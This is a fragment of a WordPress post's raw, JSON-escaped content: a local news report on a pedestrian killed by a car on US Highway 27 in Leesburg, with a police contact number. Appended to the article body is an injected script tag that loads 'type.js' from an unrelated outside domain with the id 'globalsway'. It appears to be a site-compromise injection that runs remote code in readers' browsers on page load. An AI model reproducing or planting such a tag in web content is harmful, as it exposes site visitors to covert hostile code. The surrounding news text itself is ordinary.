Joe Iozzi, the incident occurred Tuesday night at approximately 10:00 pm near the intersection of US Hwy 27 and Griffin Road in Leesburg.<\/p>\n<p>Leesburg Police responded to the area and found that 54-yrear-old Terrald Norris was struck by a 2009 Volkswagen Jetta driven by 19-year-old Taylor Walker.<\/p>\n<p>Walker was driving southbound on Highway 27 when her vehicle struck Norris.<\/p>\n<p>Norris was transported to the Leesburg Regional Medical Center where he was later pronounced dead from injuries sustained in the accident.<\/p>\n<p>According to the statement, the incident is still under investigation and police are asking anyone with information to contact the Leesburg Police Department Traffic Unit at (352)728-9860.<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>LEESBURG &#8211;\u00a0A pedestrian was killed Tuesday night after being struck by a vehicle while crossing US Highway 27 according to Leesburg Police.
